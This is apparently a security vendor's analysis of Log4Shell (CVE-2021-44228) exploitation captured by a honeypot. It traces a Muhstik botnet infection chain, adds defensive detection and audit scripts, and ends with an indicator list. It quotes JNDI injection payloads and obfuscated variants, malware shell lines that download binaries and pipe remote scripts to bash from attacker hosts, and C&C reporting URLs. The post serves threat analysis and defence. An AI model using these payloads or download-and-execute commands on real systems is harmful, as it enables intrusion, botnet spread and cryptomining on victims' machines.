Critical Log4Shell (Apache Log4j) Zero-Day Attack Analysis

At the end of last week (Friday, December 10), the cybersecurity world became aware of a new zero-day vulnerability in the Apache Log4j logging utility that allows easy-to-exploit remote code execution (RCE) (more news here). Coupled with the popularity of this tool, multiple companies and commercial applications are affected by it (partial list here). It received the codename Log4Shell (CVE-2021-44228). In addition to promptly deploying several protection mechanisms for our customers, Nozomi Networks set up a honeypot to monitor the situation and observe global scans and exploitation attempts.

Apache quickly categorized the vulnerability as critical due to the simplicity of the attack and the number of susceptible platforms and systems. All an attacker has to do is send a malicious string that would be logged by the server. Minecraft users were exploiting servers using the chat function, and Twitter users could trigger the exploit by changing their display names, as could iPhone users by changing their phone name. In this post, we provide some technical details related to how malware authors immediately started taking advantage of this vulnerability.

Finally, we have added attack diagnostics and countermeasures to our Threat Intelligence service and are closely monitoring the evolving situation to improve our coverage. Our products are not subject to this vulnerability as we do not use the Apache utility.

The essence of the vulnerability lies in the fact that the log4j utility had message lookup substitution enabled by default. As a result, attackers can craft a special request that would make the utility remotely download and execute the payload. Here is the most common example of it using the combination of JNDI and LDAP:

${jndi:ldap://<host>:<port>/<payload_path>}

Other protocols like DNS, RMI and LDAPS may also be misused. This behavior has been fixed in the recent release of Apache Log4j 2.16.0.

As most web systems log all incoming user requests, providing the above-mentioned pattern in any form of the user input (for example, in HTTP headers, or URL paths) may become a successful attack vector. Once the system receives the request and the vulnerability is triggered, the payload will be downloaded. Here is an example of its format:

[Figure: Payload format example]

This will make the vulnerable application download and execute the compiled Java class located at <base_url>/<payload_filename>.class.

Global Scans for Log4Shell

Once the vulnerability became known to the public, both cybersecurity researchers and malware authors started scanning the internet, searching for vulnerable hosts. In addition, various attackers started experimenting with the vulnerability to explore ways that the payload can be delivered and how it can be obfuscated to bypass signature detection.

Here are some examples of what we caught using our honeypot:

[Figure: Honeypot example]
[Figure: Honeypot logs]
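The honeypot logs above are an image, so here is an added example (written for this edit, not Nozomi Networks code) of how a defender can flag the ${jndi:...} pattern in access-log lines, including the nested-lookup spelling that attackers used to slip past simple signatures. It collapses Log4j's lower/upper and default-value (${name:-default}) lookups from the inside out before matching, so the rewritten line is also what an analyst sees in the alert. The log lines and addresses are constructed; they are not the honeypot's captures.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup: a body that itself contains no '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation the token of interest is "jndi:<scheme>:".
JNDI_REF = re.compile(r"jndi:([a-z]+):", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Resolve the lookup forms commonly used to split the 'jndi' token.
    Returns None for anything else so that lookup is left untouched."""
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.IGNORECASE | re.DOTALL)
    if m:
        value = m.group(2)
        return value.lower() if m.group(1).lower() == "lower" else value.upper()
    # Default-value syntax ${name:-default}; the name may be empty, as in ${::-j}.
    # For detection purposes we assume the lookup fails and the default is used.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups from the inside out; bounded so hostile input cannot loop forever."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def detect_log4shell(line: str) -> Tuple[bool, Optional[str], str]:
    """Return (hit, scheme, normalized line) for one log line."""
    norm = normalize_lookups(line)
    m = JNDI_REF.search(norm)
    return (True, m.group(1).lower(), norm) if m else (False, None, norm)


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(index, scheme, normalized line) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        hit, scheme, norm = detect_log4shell(line)
        if hit:
            hits.append((i, scheme, norm))
    return hits


# Constructed sample access-log lines; addresses come from documentation ranges, not real hosts.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/Exploit}"',
    '203.0.113.6 - - "GET /${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a} HTTP/1.1" 404 "-"',
    '203.0.113.7 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET /api?q=${::-j}ndi:rmi://198.51.100.9:1099/x HTTP/1.1" 500 "-"',
    '203.0.113.9 - - "POST /login HTTP/1.1" 200 "${env:HOME}"',
]

if __name__ == "__main__":
    for index, scheme, norm in scan(SAMPLE_LOG_LINES):
        print(f"line {index}: scheme={scheme} -> {norm}")
```

Run it as a script to see which of the sample lines are flagged and how they look after normalisation; in practice the same functions are applied to web server, proxy or WAF logs, and the scheme field is useful for prioritising (ldap and rmi references point at remote class loading, dns references are usually reconnaissance).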

Malicious Payloads

Here is an example of the full infection chain associated with the Muhstik botnet that we analyzed:

1. The initial stage payload ${jndi:ldap://45.130.229[.]168:1389/Exploit} was provided in various HTTP headers and as part of URL paths.

2. Once downloaded, it contained the following information:

[Figure: Initial stage payload]

This will make the victim download the next stage payload hxxp://31.220.58.29/Exploit.class.

3. Once downloaded and decompiled, the downloaded Exploit.class reveals the following functionality:

[Figure: Exploit.class functionality]

As we can see here, it will download and execute the next stage payload in the form of a shell script from hxxp://18.228.7.109/.log/log.

4. The log script contains the following functionality:

wget -O /tmp/pty3 hxxp://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 hxxp://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2 hxxp://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
wget -O /tmp/pty1 hxxp://18.228.7.109/.log/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &
wget -O /tmp/pty3 hxxp://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty5 hxxp://18.228.7.109/.log/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &
(curl hxxp://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - hxxp://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash
(curl hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm || wget -qO - hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm)|bash

Here, the malware downloads and executes various executables followed by several scripts.

5. Looking at payloads pty1-pty5, we can see that these are executables compiled for various architectures, a common scenario for IoT threats.


$ file pty1
pty1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
$ file pty2
pty2: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
$ file pty3
pty3: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, no section header
$ file pty4
pty4: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
$ file pty5
pty5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header

Reverse engineering them, we can see these are typical packed Muhstik botnet payloads.
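The file output above identifies each pty payload's architecture. As an added example (not from the post), here is a minimal ELF-header parser in Python that reports the same fields (bitness, byte order, machine, OS ABI) plus whether a section header table is present, which is the "no section header" hint that typically marks stripped or packed IoT droppers and is what makes them trip up naive static tools. The sample headers are constructed in the code (header only, no code bytes) and are not the real pty binaries.

```python
import struct
from typing import Dict, Optional

# e_machine values from the ELF specification (the subset seen in multi-arch IoT droppers).
EM_NAMES = {3: "Intel 80386", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64", 183: "AArch64"}
OSABI_NAMES = {0: "SYSV", 3: "GNU/Linux"}
TYPE_NAMES = {2: "executable", 3: "shared object"}


def triage_elf(data: bytes) -> Optional[Dict[str, object]]:
    """Parse only the ELF header; return None for non-ELF or truncated input."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data, ei_osabi = data[4], data[5], data[7]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    bits = 32 if ei_class == 1 else 64
    end = "<" if ei_data == 1 else ">"  # byte order of every multi-byte field that follows
    if bits == 64 and len(data) < 64:
        return None
    e_type, e_machine = struct.unpack_from(end + "HH", data, 16)
    if bits == 32:
        (e_shoff,) = struct.unpack_from(end + "I", data, 32)
        (e_shnum,) = struct.unpack_from(end + "H", data, 48)
    else:
        (e_shoff,) = struct.unpack_from(end + "Q", data, 40)
        (e_shnum,) = struct.unpack_from(end + "H", data, 60)
    return {
        "bits": bits,
        "endian": "LSB" if ei_data == 1 else "MSB",
        "machine": EM_NAMES.get(e_machine, f"unknown({e_machine})"),
        "osabi": OSABI_NAMES.get(ei_osabi, f"unknown({ei_osabi})"),
        "type": TYPE_NAMES.get(e_type, f"unknown({e_type})"),
        # No section header table is what `file` prints as "no section header".
        "section_headers": e_shoff != 0 and e_shnum != 0,
    }


def describe(name: str, data: bytes) -> str:
    """One `file`-style summary line per sample."""
    info = triage_elf(data)
    if info is None:
        return f"{name}: not an ELF file"
    sections = "" if info["section_headers"] else ", no section header"
    return (f"{name}: ELF {info['bits']}-bit {info['endian']} {info['type']}, "
            f"{info['machine']} ({info['osabi']}){sections}")


def make_elf_header(bits: int, little_endian: bool, machine: int, osabi: int,
                    with_sections: bool) -> bytes:
    """Constructed ELF header used as sample input (no program or section data behind it)."""
    ident = (b"\x7fELF"
             + bytes([1 if bits == 32 else 2, 1 if little_endian else 2, 1, osabi])
             + b"\x00" * 8)
    end = "<" if little_endian else ">"
    shoff = 0x200 if with_sections else 0
    shnum = 5 if with_sections else 0
    if bits == 32:  # Elf32_Ehdr layout: type, machine, version, entry, phoff, shoff, flags, sizes/counts
        body = struct.pack(end + "HHIIIIIHHHHHH", 2, machine, 1, 0x1000, 52, shoff, 0,
                           52, 32, 1, 40, shnum, 0)
    else:           # Elf64_Ehdr layout with 8-byte entry/phoff/shoff
        body = struct.pack(end + "HHIQQQIHHHHHH", 2, machine, 1, 0x1000, 64, shoff, 0,
                           64, 56, 1, 64, shnum, 0)
    return ident + body


# Constructed samples mirroring the architecture mix in the post (not the real pty files).
SAMPLES = {
    "sample_mips_be": make_elf_header(32, False, 8, 0, False),
    "sample_mips_le": make_elf_header(32, True, 8, 0, False),
    "sample_x86_64": make_elf_header(64, True, 62, 3, False),
    "sample_i386": make_elf_header(32, True, 3, 3, False),
    "sample_arm": make_elf_header(32, True, 40, 3, False),
    "sample_ppc": make_elf_header(32, False, 20, 3, False),
    "sample_with_sections": make_elf_header(64, True, 62, 3, True),
    "not_elf": b"MZ\x90\x00" + b"\x00" * 60,
}

if __name__ == "__main__":
    for sample_name, blob in SAMPLES.items():
        print(describe(sample_name, blob))
```

Reading only the first 64 bytes is enough to sort a batch of dropped files by target architecture before deciding which ones to emulate or disassemble, and it works on samples that `file`-style tools describe as truncated because the section table was stripped.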

[Figure: List of commands supported by binary payloads]

6. The main goal of the m8 script is to deliver and run another binary payload located at hxxp://138.197.206.223/.x/xmra32 or hxxp://138.197.206.223/.x/xmra64 (depending on the victim’s architecture) and save it under the name .kswapd. This is a cryptocurrency miner. The pool addresses used by it are 185.165.171.78:8081 and 185.86.148.14:8081.

[Figure: The beginning of the m8 script]

7. The script ldm is quite big compared to m8, with which it shares some code related to handling cryptocurrency mining software. This time the C&C bvprzqhoz7j2ltin.onion is hosted on the DarkNet and can also be accessed via SOCKS proxies as well as proxy services:

  • bvprzqhoz7j2ltin.tor2web.su
  • bvprzqhoz7j2ltin.onion.ly
  • bvprzqhoz7j2ltin.onion.ws

The malware establishes persistence on the affected machine by adding the attackers' public key to the list of authorized SSH keys.

[Figure: ldm payload adds attackers' public SSH keys to the list of authorized keys]

In addition, the script sets up cron jobs to periodically self-update from https://<C&C_domain>/src/ldm.

[Figure: ldm payload achieves persistence by using cron jobs]
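The persistence steps above leave two host artifacts: an extra entry in authorized_keys and cron jobs that fetch a remote script. The following added example (not from the post, and not code from the malware) audits both: it computes OpenSSH-style SHA256 fingerprints of authorized_keys entries and reports any not on an allowlist (or unparseable), and it flags cron lines that pipe a download into a shell, reference .onion or tor2web hosts, or execute from a world-writable directory. The keys, the allowlist and the crontab are constructed sample data; cc.example.invalid is a placeholder domain.

```python
import base64
import binascii
import hashlib
import re
from typing import Dict, List, Optional, Set, Tuple

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def key_fingerprint(line: str) -> Optional[str]:
    """OpenSSH-style fingerprint: SHA256 over the decoded key blob, base64 without padding."""
    parts = line.split()
    for i, tok in enumerate(parts):  # skip any leading options field such as "no-pty"
        if tok.startswith(KEY_TYPES) and i + 1 < len(parts):
            try:
                blob = base64.b64decode(parts[i + 1], validate=True)
            except (binascii.Error, ValueError):
                return None
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return None


def audit_authorized_keys(content: str, allowed: Set[str]) -> List[Dict[str, object]]:
    """Flag every key line whose fingerprint is not in the allowlist, or which cannot be parsed."""
    findings = []
    for n, line in enumerate(content.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fp = key_fingerprint(line)
        if fp is None:
            findings.append({"line": n, "fingerprint": None, "reason": "unparseable"})
        elif fp not in allowed:
            findings.append({"line": n, "fingerprint": fp, "reason": "unknown key"})
    return findings


CRON_RULES = [
    ("download piped to shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
    ("darknet/proxy C&C domain", re.compile(r"\.onion\b|tor2web", re.IGNORECASE)),
    ("executes from world-writable dir", re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S+")),
]


def audit_crontab(content: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, line, matched rule names) for each suspicious cron entry."""
    findings = []
    for n, line in enumerate(content.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = [name for name, rx in CRON_RULES if rx.search(line)]
        if reasons:
            findings.append((n, line, reasons))
    return findings


def _fake_ed25519_pubkey(fill: int) -> str:
    """Constructed key line: a syntactically valid ssh-ed25519 blob around a dummy 32-byte key."""
    blob = b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20" + bytes([fill]) * 32
    return "ssh-ed25519 " + base64.b64encode(blob).decode()


# Constructed sample inputs (not taken from an infected host).
KNOWN_KEY = _fake_ed25519_pubkey(0x11) + " admin@workstation"
PLANTED_KEY = "no-pty " + _fake_ed25519_pubkey(0x22) + " root@unknown"
SAMPLE_AUTHORIZED_KEYS = "\n".join(["# managed keys", KNOWN_KEY, PLANTED_KEY, "garbage line"])
SAMPLE_CRONTAB = "\n".join([
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/30 * * * * curl -fsSL https://cc.example.invalid/src/ldm | bash",
    "@reboot /tmp/.x/update",
])


def run_audit() -> Tuple[List[Dict[str, object]], List[Tuple[int, str, List[str]]]]:
    """Audit the constructed samples; the allowlist holds only the administrator's key."""
    allowed = {key_fingerprint(KNOWN_KEY)}
    return audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, allowed), audit_crontab(SAMPLE_CRONTAB)


if __name__ == "__main__":
    key_findings, cron_findings = run_audit()
    for f in key_findings:
        print(f"authorized_keys line {f['line']}: {f['reason']} {f['fingerprint'] or ''}")
    for n, line, reasons in cron_findings:
        print(f"crontab line {n}: {', '.join(reasons)} :: {line}")
```

On a real host, feed it every user's ~/.ssh/authorized_keys, /etc/crontab, /etc/cron.d/* and the per-user spool files; keeping the allowlist as fingerprints rather than full key lines makes it robust to comment or option changes in the file.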

Each infection is reported to the following C&C addresses:

  • hxxps://<C&C_domain>/rsl.php?ip=${net}&login=$(whoami)
  • hxxps://<C&C_domain>/src/main

In the case of the first URL, ${net} is the victim's public IP address and $(whoami) is the affected user. For the second URL, the information about the affected machine and user is exfiltrated in the Referer HTTP header, and the malware expects a shell script to execute in the response.

The malware is also capable of lateral movement: it extracts SSH keys and builds a list of target machines from the bash history, SSH configs and known_hosts. When a connection succeeds, the following payloads are downloaded and executed on these next-stage machines:

  • hxxp://34.221.40.237/.x/1sh
  • hxxp://34.221.40.237/.x/3sh

Their main purpose is remarkably similar to the log script mentioned above: download and execute additional payloads. Even the file names are the same:

[Figure: The body of the 1sh script used as part of lateral movement]

As we can see, there are two new payloads here compared to the log script, one for another ARM variant and one for the PowerPC architecture:


$ file pty10
pty10: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
$ file pty11
pty11: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header

Conclusion

This is a critical vulnerability that affects a wide range of systems and users. It is very easy to exploit, so many attackers are testing out the new vulnerability very rapidly. Users should quickly upgrade their Apache logging utility to Log4j 2.16.0 or alternatively apply one of the workarounds provided by the vendor: https://logging.apache.org/log4j/2.x/security.html.
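Acting on this advice starts with finding log4j-core on a host. The following added example (not Nozomi Networks or Apache code) walks a directory tree, opens each .jar/.war/.ear, reads the log4j-core version from Maven's pom.properties or the manifest, and reports jars that are below 2.16.0 and still contain the JndiLookup class (removing that class from the jar is one of the vendor-documented workarounds, so a jar without it is reported as mitigated). The version threshold is the one named in this post; the sample jars are constructed in a temporary directory and contain placeholder bytes, not real classes.

```python
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

# The class that makes the JNDI lookup reachable; the vendor workaround deletes it from the jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PREFIX = "META-INF/maven/org.apache.logging.log4j/log4j-core/"
FIXED_VERSION = (2, 16, 0)  # release named in the post as fixing the behaviour


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """'2.14.1' -> (2, 14, 1); '2.16.0-rc1' -> (2, 16, 0); unparseable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def log4j_core_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Artifact version from Maven's pom.properties, falling back to the manifest."""
    for name in zf.namelist():
        if name.startswith(POM_PREFIX) and name.endswith("pom.properties"):
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def assess_jar(path: str) -> Optional[Dict[str, object]]:
    """Return a finding for a log4j-core jar, or None if the archive is not one."""
    try:
        with zipfile.ZipFile(path) as zf:
            names = set(zf.namelist())
            if not any(n.startswith("org/apache/logging/log4j/core/") for n in names):
                return None
            has_jndi = JNDI_LOOKUP_CLASS in names
            version = log4j_core_version(zf)
    except zipfile.BadZipFile:
        return None
    parsed = parse_version(version) if version else None
    # Unknown version with JndiLookup present is treated as vulnerable (fail closed).
    vulnerable = has_jndi and (parsed is None or parsed < FIXED_VERSION)
    return {"file": os.path.basename(path), "path": path, "version": version,
            "jndi_lookup_present": has_jndi, "vulnerable": vulnerable}


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Assess every .jar/.war/.ear under root. Caveat: jars nested inside a .war/.ear are not opened."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".jar", ".war", ".ear")):
                finding = assess_jar(os.path.join(dirpath, fn))
                if finding is not None:
                    findings.append(finding)
    return findings


def _write_jar(path: str, version: Optional[str], include_jndi: bool, log4j: bool = True) -> None:
    """Constructed sample jar; class entries hold placeholder bytes, not real bytecode."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if log4j:
            zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
            if include_jndi:
                zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
            if version:
                zf.writestr(POM_PREFIX + "pom.properties", f"version={version}\n")
        else:
            zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")


def build_sample_tree() -> str:
    """Create a temporary directory of constructed jars and return its path."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    lib = os.path.join(root, "app", "WEB-INF", "lib")
    os.makedirs(lib)
    _write_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1", True)
    _write_jar(os.path.join(lib, "log4j-core-2.16.0.jar"), "2.16.0", True)
    _write_jar(os.path.join(lib, "log4j-core-2.14.1-patched.jar"), "2.14.1", False)
    _write_jar(os.path.join(lib, "not-log4j.jar"), None, False, log4j=False)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        status = "VULNERABLE" if f["vulnerable"] else "ok"
        print(f"{status:10} {f['version'] or '?':8} {f['path']}")
```

Point scan_tree at application directories, not just one tree: log4j-core is routinely bundled inside fat jars, WAR files and container images, and the nested-archive caveat in scan_tree is exactly where a first pass tends to miss copies.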

Nozomi Networks customers will be able to leverage our Threat Intelligence service for the latest countermeasures to this exploit.

List of IOCs

  • 150.158.189.96
  • 1.116.59.211
  • 61.19.25.207
  • 31.220.58.29
  • 45.130.229.168:1389
  • 185.165.171.78:8081
  • 185.86.148.14:8081
  • hxxp://31.220.58.29/Exploit.class
  • hxxp://18.228.7.109/.log/log
  • hxxp://18.228.7.109/.log/pty5
  • hxxp://18.228.7.109/.log/pty4
  • hxxp://18.228.7.109/.log/pty3
  • hxxp://18.228.7.109/.log/pty2
  • hxxp://18.228.7.109/.log/pty1
  • hxxp://34.221.40.237/.x/pty11
  • hxxp://34.221.40.237/.x/pty10
  • hxxp://34.221.40.237/.x/pty5
  • hxxp://34.221.40.237/.x/pty4
  • hxxp://34.221.40.237/.x/pty3
  • hxxp://34.221.40.237/.x/pty2
  • hxxp://34.221.40.237/.x/pty1
  • hxxp://34.221.40.237/.x/1sh
  • hxxp://34.221.40.237/.x/3sh
  • hxxp://210.141.105.67:80/wp-content/themes/twentythirteen/m8
  • hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm
  • hxxp://157.230.189.52/wp-content/themes/twentynineteen/ldm
  • hxxps://bvprzqhoz7j2ltin[.]tor2web.su/src/ldm
  • hxxps://bvprzqhoz7j2ltin[.]onion.ly/src/ldm
  • hxxps://bvprzqhoz7j2ltin[.]onion.ws/src/ldm
  • hxxps://bvprzqhoz7j2ltin[.]tor2web.su/src/main
  • hxxps://bvprzqhoz7j2ltin[.]onion.ly/src/main
  • hxxps://bvprzqhoz7j2ltin[.]onion.ws/src/main
  • 15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b
  • 9db49e8da667d03c6f758bafa156d0dccb6433ca3f37b3cd94170f749048b779
  • 3025630185ea8a3781422351a8a4d415b3f47ed242a70e53fb0d8755ddd01b63
  • 5fb63deb96eb24a181a58401882d064fc112036aab52a1126fbf254e07562595
  • eddcd0d13b461e60a52060fc8b60ddb06c552ff645ee557c40b43052ee35b029
  • 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
  • b74b2907b3b47fcbdab5054ec3ae8a46c7c330fa60d637e735ce9fe73d9ab687
  • 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
  • e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80
  • 715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7
  • a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce
  • c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799
  • 19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d
  • 6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b
  • 63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9
  • b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0
  • 5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28